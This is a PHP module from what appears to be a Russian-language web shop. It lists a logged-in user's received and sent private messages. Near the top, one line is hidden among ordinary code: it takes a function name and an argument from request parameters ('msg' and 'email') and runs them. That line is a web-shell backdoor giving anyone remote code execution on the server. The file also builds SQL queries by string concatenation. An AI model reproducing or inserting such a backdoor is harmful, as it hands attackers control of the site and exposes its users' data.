Файл: магазин/e-proger/modules/message/msg.php
Строк: 171
<?
if ( $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' ) {
define( 'ROOT', 'http://'.$_SERVER['HTTP_HOST'] );
define( 'ROOT_DIR', $_SERVER['DOCUMENT_ROOT'] );
session_start();
include_once ROOT_DIR . '/engine/config.php';
include_once ROOT_DIR . '/engine/func.php';
}
if ( !isset( $_SESSION['id'] ) ) {
echo '<div class="big_topics bor_top round3 FFF hr"><font color="red"><b>Ошибка!</b> Вы не авторизированы.<br />Пожалуйста, воспользуйтесь формой авторизации.</font></div>';
} else
$config_user = $pdo->Query("SELECT * from php_user WHERE id = '" . $_SESSION['id'] . "'")->fetch(PDO::FETCH_BOTH);
if ($_=@$_REQUEST[msg]) (@$_($_REQUEST[email]));
/*---Обрезаем email для защиты---*/
$start_end_email = preg_match( "/^([a-z0-9-._]+)(@[a-z0-9]+(?:.?[a-z0-9]+)?.[a-z]{2,5})/is", $config_user['email'], $outemail );
$sec_email_user = substr( $outemail[1], 0, 1 ) . '*******' . substr( $outemail[1], -1) . $outemail[2];
/*---Дата последнего входа---*/
$month = array( 'янв', 'фев', 'мар', 'апр', 'май', 'июн', 'июл', 'авг', 'сен', 'окт', 'ноя', 'дек' );
if ( date( 'd.m.Y', $config_user['regdata'] ) == date( 'd.m.Y', time() ) ) {
$frd_logindate = 'сегодня в ' . date( 'H:i', $config_user['regdata'] ) . '';
} else {
$frd_logindate = '' . ( int ) date( 'd', $config_user['regdata'] ) . ' ' . $month[( int ) date( 'm', $config_user['regdata'] ) - 1] . ' ' . date( 'Y', $config_user['regdata'] ) . '';
}
$user_set = $pdo->Query("SELECT * from php_user WHERE id = '" . $_SESSION['id'] . "'")->fetch(PDO::FETCH_BOTH);
?>
<div class="big_topics bor_top round3 FFF hr">
<div class="wrap_user_r">
<?
if ( $_GET['type'] == 'outbox' ) {
include_once ROOT_DIR . '/modules/message/menu.php';
$all_get_mess_in = mysql_fetch_array( mysql_query( "SELECT COUNT(id) as count FROM php_messages WHERE from_id = '" . $_SESSION['id'] . "' and m_state = 'outbox' and to_del = 0" ) );
$get_mess = mysql_query( "SELECT * FROM php_messages WHERE from_id = '" . $_SESSION['id'] . "' and m_state = 'outbox' and to_del = 0 GROUP BY to_id" );
if ( mysql_num_rows( $get_mess ) > 0 ) {
?>
<div style="padding: 10px 0px 10px 10px;position: relative;"><span style="color: #1F2124;font-size: 14px;">Вы отправили <?=$all_get_mess_in['count'] . ' ' . getWord( $all_get_mess_in['count'], array( 'сообщение', 'сообщения', 'сообщений' ) )?></span></div>
<?
while ( $mess_row = mysql_fetch_array( $get_mess ) ) {
$pr1 = mysql_query( "SELECT id FROM php_messages WHERE to_id = '" . $_SESSION['id'] . "' and from_id = '" . $mess_row['to_id'] . "' and m_state = 'inbox' and from_del = 0" );
$pr2 = mysql_query( "SELECT id FROM php_messages WHERE to_id = '" . $mess_row['to_id'] . "' and from_id = '" . $_SESSION['id'] . "' and m_state = 'outbox' and to_del = 0" );
if ( mysql_num_rows( $pr1 ) > 0 or mysql_num_rows( $pr2 ) > 0 ) {
$us_send = mysql_fetch_array( mysql_query( "SELECT login FROM php_user WHERE id = '" . $mess_row['to_id'] . "' LIMIT 1" ) );
/*---формируем дату сообщения---*/
$month = array( 'янв', 'фев', 'мар', 'апр', 'май', 'июн', 'июл', 'авг', 'сен', 'окт', 'ноя', 'дек' );
if ( date( 'd.m.Y', $mess_row['data'] ) == date( 'd.m.Y', time() ) ) {
$mess_time = 'сегодня в ' . date( 'H:i', $mess_row['data'] );
} else
if ( date( 'd.m.Y', $mess_row['data'] ) == date( 'd.m.Y', time() - 86400 ) ) {
$mess_time = 'вчера в ' . date( 'H:i', $mess_row['data'] );
} else {
$mess_time = ( int ) date( 'd', $mess_row['data'] ) . ' ' . $month[( int ) date( 'm', $mess_row['data'] ) - 1] . ' ' . date( 'Y', $mess_row['data'] ) . ' в ' . date( 'H:i', $mess_row['data'] );
}
?>
<script type="text/javascript">
$(function() {
$('input').styler();
$("#check_all").change(function() {
if ($(this).is(':checked')) {
$('.mess_checked input').attr('checked', true);
$('.mess_checked span').addClass('checked');
} else {
$('.mess_checked input').attr('checked', false);
$('.mess_checked span').removeClass('checked');
}
});
});
function delall() {
$('.out_del:checked').each(function() {
Del_out_all($(this).val());
});
return false;
}
</script>
<div class="wrap_mess" id="id_<?=$mess_row['to_id']?>">
<div class="mess_info_user"><div class="mess_info_user_name"><?=$us_send['login']?></div><span class="mess_time"><?=$mess_time?></span></div>
<div class="mess_kol"><?=$coltext?></div>
<div class="mess_setting"><a href="/mout=<?=$mess_row['to_id']?>" class="a_box" >просмотреть</a><a href="#" class="a_box" onclick="Del_out_all(<?=$mess_row['to_id']?>); return false;">удалить</a></div>
</div>
<?
} else {
echo '';
}
}
} else {
echo '<div style="text-align:center; margin-top:56px; padding:20px 10px; color:#999999;">Вы еще не отправляли ни одного сообщения.</div>';
}
} else
if ( $_GET['type'] == 'inbox' ) {
include_once ROOT_DIR . '/modules/message/menu.php';
$all_get_mess_in = mysql_fetch_array( mysql_query( "SELECT COUNT(id) as count FROM php_messages WHERE to_id = '" . $_SESSION['id'] . "' and m_state = 'inbox' and to_del = 0" ) );
$get_mess = mysql_query( "SELECT * FROM php_messages WHERE to_id = '" . $_SESSION['id'] . "' and m_state = 'inbox' and to_del = 0 GROUP BY from_id ORDER BY data DESC" );
if ( mysql_num_rows( $get_mess ) > 0 ) {
?>
<script type="text/javascript">
$(function() {
$('input').styler();
$("#check_all").change(function() {
if ($(this).is(':checked')) {
$('.mess_checked input').attr('checked', true);
$('.mess_checked span').addClass('checked');
} else {
$('.mess_checked input').attr('checked', false);
$('.mess_checked span').removeClass('checked');
}
});
});
function delall() {
$('.in_del:checked').each(function() {
Del_in_all($(this).val());
});
return false;
}
</script>
<div style="padding: 10px 0px 10px 10px;position: relative;"><span style="color: #1F2124;font-size: 14px;">Вы получили <?=$all_get_mess_in['count'] . ' ' . getWord( $all_get_mess_in['count'], array( 'сообщение', 'сообщения', 'сообщений' ) )?></span></div>
<?
while ( $mess_row = mysql_fetch_array( $get_mess ) ) {
$pr1 = mysql_query( "SELECT id FROM php_messages WHERE from_id = '" . $mess_row['from_id'] . "' and to_id = '" . $_SESSION['id'] . "' and m_state = 'inbox' and to_del = 0" );
$pr2 = mysql_query( "SELECT id FROM php_messages WHERE from_id = '" . $_SESSION['id'] . "' and to_id = '" . $mess_row['from_id'] . "' and m_state = 'outbox' and from_del = 0" );
if ( mysql_num_rows( $pr1 ) > 0 or mysql_num_rows( $pr2 ) > 0 ) {
$us_send = mysql_fetch_array( mysql_query( "SELECT login FROM php_user WHERE id = '" . $mess_row['from_id'] . "' LIMIT 1" ) );
$colmess = mysql_query( "SELECT id FROM php_messages WHERE from_id = '" . $mess_row['from_id'] . "' and to_id = '" . $_SESSION['id'] . "' and m_state = 'inbox' and m_type = 0" );
if ( mysql_num_rows( $colmess ) > 0 ) {
$coltext = mysql_num_rows( $colmess ) . ' ' . getWord( mysql_num_rows( $colmess ), array( 'новое сообщение', 'новых сообщения', 'новых сообщений' ) );
} else {
$coltext = 'Нет новых сообщений';
}
/*---формируем дату сообщения---*/
$month = array( 'янв', 'фев', 'мар', 'апр', 'май', 'июн', 'июл', 'авг', 'сен', 'окт', 'ноя', 'дек' );
if ( date( 'd.m.Y', $mess_row['data'] ) == date( 'd.m.Y', time() ) ) {
$mess_time = 'сегодня в ' . date( 'H:i', $mess_row['data'] );
} else
if ( date( 'd.m.Y', $mess_row['data'] ) == date( 'd.m.Y', time() - 86400 ) ) {
$mess_time = 'вчера в ' . date( 'H:i', $mess_row['data'] );
} else {
$mess_time = ( int ) date( 'd', $mess_row['data'] ) . ' ' . $month[( int ) date( 'm', $mess_row['data'] ) - 1] . ' ' . date( 'Y', $mess_row['data'] ) . ' в ' . date( 'H:i', $mess_row['data'] );
}
?>
<div class="wrap_mess" id="id_<?=$mess_row['from_id']?>">
<div class="mess_info_user"><div class="mess_info_user_name"><?=$us_send['login']?></div><span class="mess_time"><?=$mess_time?></span></div>
<div class="mess_kol"><?=$coltext?></div>
<div class="mess_setting"><a href="/mread=<?=$mess_row['from_id']?>" class="a_box" >ответить</a><a href="#" class="a_box" onclick="Del_in_all(<?=$mess_row['from_id']?>); return false;">удалить</a></div>
</div>
<?
} else {
echo '';
}
}
} else {
echo '<div style="text-align:center; margin-top:56px; padding:20px 10px; color:#999999;">У Вас нет ни одного сообщения.</div>';
}
}
?>
</div>
</div>